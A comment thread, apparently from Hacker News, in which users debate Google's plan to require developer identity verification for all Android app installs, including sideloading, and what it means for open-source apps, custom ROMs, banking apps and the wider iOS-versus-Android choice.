Mobile in general is a second class ecosystem. You're paying to ride in a bus that most ride for free, and when you sit down it's squishy.
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to setup Android signing keys and needing to provide ID is not fun. It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
They are namespacing, like it or not, and clearly they don't care about open-source that much.
The article didn't say much about the account approval process, but from the looks of it Google will be able to arbitrarily accept and revoke applications as they see fit. So much for an open platform, bring forth the gatekeeping!
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
That's the first step toward banning NSFW apps like on Steam, I'm afraid.
So that's it then.
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
In time, you will only be able to access banking from your desktop using an approved OS and browser with attestation...
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
A recent real life example:
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
Not true for either my AIB or Wise account.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
I mean, I'm sure it's true for some banks or financial services, but that's not really the same thing.
A dedicated app on a locked down OS is vastly more controllable than something like a browser that can do virtually whatever it wants.
Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Official announcement: https://android-developers.googleblog.com/2025/08/elevating-...
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
Can you elaborate a little bit about this hidden internet access control setting?
<uses-permission android:name="android.permission.INTERNET" />
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
Even device owner (MDM) apps can't revoke that permission.
You can deny it on Graphene OS.
"Hidden" isn't exactly right. It's completely inaccessible, unless you use a custom ROM like LineageOS. But it is a real permission:
https://developer.android.com/develop/connectivity/network-o...
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've never managed to find even a single PoC bypassing it
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.> would be a catastrophic change to the ecosystem.
Hey we were already on board with this, you don't have to convince us.
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
It will be interesting to see how they handle packages from the various f-droid repos. F-droid builds and signs all their apps themselves, so will all of f-droid be covered by a single signing key and developer account? Or will the fact that they take apps from lots of folks bar them from an account?
F-Droid generates a unique key for each app and that key is then reused for all builds of that app. This will probably just require registering the F-Droid public key to the package name with Google.
I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
Unless I misunderstood the question, this is covered in TFA
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
You have misunderstood the question, or perhaps buried the lede. 'Open in that regard' is tantamount to not open at all. If you gatekeep being able to load an app to an Android phone behind these processes, you're essentially stuck with no recourse if you, say, have a banned google account, or have some reason you don't wish to send your government ID to these companies.
It also makes sure you only get one ID for life. There’s no creating a second account if you get banned because they’ll (likely at some point) collect biometric data as part of the verification process.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
Who's going to break them down? The governments also want this.
I was responding to this:
> I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
I wasn't trying to claim everything is hunky dory, just that they aren't "going to just ban" other app stores.
How does that jive with this statement:
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
Does that amount to "just ban[ning]" other app stores? If not then... it jives fine? Not here to say it's a good thing.
Your own quote shows the source of the confusion. OC was asking how will google handle apps that have somebody else signing for them. Your quote talks about letting devs that go through a verification process still side load (though that has no real benefit at that point since google still holds control over you)
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
How long until Google decides to lock it down because "scammers" can "abuse" it?
What does this break?
There shouldn't be any side effects other than rendering Play Protect inert. No other AOSP component relies on this setting.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
Some bank apps and payment processor already check if you have developer mode on and refuses to run.
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
How did we let this happen?
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
> Google wants to combat “convincing fake apps”
Google can't even stop the scam ai companion apps on the play store that all use the same same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steals your data and serves nonstop pop up ads
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
When people say just use Linux I can only think of what was known as far back as 2014.
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
They saw Apple getting away with notarization under the DMA so they're doing the same. I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Google is doing everything in their power to make me move to an iphone... between shit like this, effectively bricking some old models of pixels with un-rollbackable patches that destroy batteries, closing down the android development process, making absurd testing requirements to publish apps, etc.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
As mentioned in OP, Apple is doing the same thing.
I'm aware, I'm saying Google is trending towards being as abusive with their software practices as Apple already is, not worse.
And saying that for me anyways the only reason I have an Android and not an IPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
If both systems are similar in terms of features and freedom, then I might as well choose the one that tracks me less and offers a more polished experience.
> Google doesn't make better phones, they were just less hostile to the consumer.
And the person you're responding to was pretty clear that the issue if they both do the same thing, Google has no edge in devices.
Precisely. If I can't control what I put on my Android phone anymore, I no longer have any reason to use an Android. iPhones have normal USB ports now, and that was the other big barrier.
> As mentioned in OP, Apple is doing the same thing.
The thing is that if Google choses to make Android OS as closed as iOS, I'd rather use an iPhone than an Android phone...
Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
Apple throttled devices that had a weak battery, because the alternative is the CPU trying to draw more power than the battery can deliver, the voltage sagging, and the phone rebooting.
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
The Nexus 6P had the same issue with random shutdowns, and although Google refused to do anything about it some users on XDA developed a patch that disabled all the performance cores completely.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
https://www.androidauthority.com/nexus-6p-bootloop-fix-78930...
Funny how no one really complained about the random reboots but everyone noticed throttling and assumed their phone was "too old" and they needed to buy a new one. Interesting how this move greatly benefited apples bottom line versus improving actual quality of life for the user considering a reboot is 30 seconds perhaps and a slow phone is slow for every second you use it.
Understood. Poor wording on my part!
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery
It wasn’t guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have choice to opt-out.
There was the opt-out part, but also the complete silence around the issue that comforted people into thinking they needed new phones every 2 years instead of just replacing the battery.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
It's not about 'saving battery' its about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
https://www.androidauthority.com/nexus-6p-lawsuit-2019-97547...
It's not a bug or issue with those phones, it's how batteries behave -- over time, they lose both their capacity and the power they output. Apple decided to throttle their phones via software instead of letting them crash.
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
No, the batteries had degraded to the point that they could not supply enough voltage and current to stably run the chip at full frequency. Replacing the battery would restore full performance.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
That’s not a true story.
Is sideloading a thing on iOS?
Yep, available to anyone. It's much more restrictive though. Basically you need a valid developer certificate to sign apps. You can use your own with a free developer account but you only get so many tokens per week and apps need to have their tokens refreshed weekly.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. EU has different system where there is no limit on amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also have a EU specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
In legal jurisdictions where Apple is forced to allow it, yes. They have a similar scheme for requiring developers to register and are demanding per-install fees for popular apps, though I'm not sure that will survive regulatory scrutiny in the EU.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
> and has to be repeated every few days.
7 days for free account.
1 year for paid (until membership ends?).
90 days for TestFlight.
Worth adding on there are methods to update signatures, altstore being one example Although using their app to help automate that then takes up one the app slots for free accounts
There's a technical possibility, but it's not a thing, as in there's not a lot of iPhone users interested in that
Yes******
* Only in europe
** kinda
*** you have to enable it in your account settings
**** you have to reinstall it every 30 days
***** more I forgot
****** fuck you - apple
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
Android's ability to run binaries outside of the Google Play Store is a key differentiator of their product vs. Apple's. Or at least it used to be.
I think this is another thing that has changed in time. Custom ROM's used to be the defining feature of Android but over time less and less people used it. I think sideloading has gotten to that point as well. Where it's a power user feature that most people don't touch. So Google feels confident in nixing it since it only affects a small group of people.
I mean, the epic games lawsuit specifically involved sideloading. There's still ongoing litigation in one of those suits. Playing fortnite isn't exactly a niche or power user thing.
Fewer people use custom ROMs not necessarily because they don't want to, but because manufacturers began putting hardware on the phones that only they have the firmware for. I have a Samsung phone that I replaced as my daily driver because the phone speaker broke from sweat. Other than the speaker it works literally perfectly. I'd love to use it to try different alternative OSs, but AFAIK, even though it's only from 2021, not a single project supports it.
Still is, all of those Chinese ROMs/phone manufacturers thriving because of this. The Chinese phone market would literally be non-existent if it weren't for the ability to run binaries outside of Google Play.
Unfortunately, it's not a differentiator at all in the market. Not to enough consumers that it remotely matters. For our niche nerdy subculture it's extremely important, but essentially nobody in the grand scheme of things even knows that binary is a thing that exists.
Can Google do something like this for entities wishing to advertise on their platform?
It feels as if that would provide far more of a public service than this... whatever this is.
This would affect a lot apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
This is crazy. I can't install my own apps on my own phone anymore.
I am gonna start carrying around a laptop with a 5G modem instead.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all it's various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
I'm curious why you need a phone for banking at all, at home as you say. Wouldn't a laptop suffice? Granted, not all banks have a web app these days
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
ding ding ding a second phone is the correct answer
That's indeed what I'm planning to do but I'll buy a Steam Deck
Don't worry, they'll stop letting you access your bank without an app soon enough. Gotta protect the children and what-not.
What was the last time there were some actually good news in big tech? For those that don't hold stocks I mean.
> What was the last time there were some actually good news in big tech?
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
We're in the era of less control, more surveillance, more "security", more being treated like a child and lied to.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
Last week. The bags I’m holding for Intel got a little lighter. Lmao.
I cannot resist the urge to point out that we wouldn't have had this problem if people actually sticked to free software instead of "commercial use friendly" open source licensing
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
source: https://en.m.wikipedia.org/wiki/Toybox
You are 100% correct.
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
Free choice in the market is a lie anyhow. You are limited by what is actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
The core benefit of Android over iOS for me has always been that it's my device, not Google's.
They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
So what are our options (eg for EU citizens) for lobbying in terms of legislation or directly to Google to show disagreement with this?
It looks like many in this thread are against, but I don't see suggestions for action?
Mobile phone platforms are reverting back to the pre-iOS/Android reality where you have to jump through tons of hoops to even make an app let alone run a viable business with it.
I don't recall having to send government ID to any companies to publish MIDlets back in the day. I just uploaded them to getjar.
I have good memories about a website with ELF's for the Siemens phones. Its name had "kebab" in it. By any chance, was it you running it?
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not a Apple fan either.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
>At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
These days I don't really want a smartphone at all, but begrudgingly use one for things like mobile banking, receiving SMS tokens, etc.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
Sounds like you want a laptop with a built-in LTE modem running Android inside a VM.
A laptop is far too big, and banking apps and the likes would refuse to run in your VM.
Hmm, don't banking apps run in emulators without much hassle? I am seeing a project on a horizon lol.
The set up I run consists of an older 5g phone that hospots to my other phone, no apps of consiquence on either phone, I sign into my email through web mail, and sign into banking through a browser, all of my apps come from fdroid and similar, mostly used for media, manual updates for those through the fdroid web site.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mic's and cameras, likely the gps, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch. * use matched resistors, or black out the sensors detach the antena for gps lets just say I realy dont like bieng advertised to
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
That's exactly the goal
We shouldn't accept "sideloading" as a term. It's meant to make "installing an app without monopolist approval" seem like a dirty/weird/niche trick.
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
A linux-based phone... with an 18650 battery slot... with a keyboard... and a meshtastic radio... drool.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
There has to be a threshold where enshittification has been pushed so far that nerd software becomes the thing cool kids boast about running.
Where a less restricted device can do cool things nobody else can do.
Well that sucks. So basically all the money weve had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
Whose smart idea was that.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
Well, I guess I didn't want to use half of the apps on my phone anyway. Might as well throw the phone in the bin.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out the of play store progressively.
I'm cancelling my Pixel 10 preorder.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
What would happen to projects like F-Droid, Termux, etc.?
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
[1] https://news.ycombinator.com/item?id=41895718
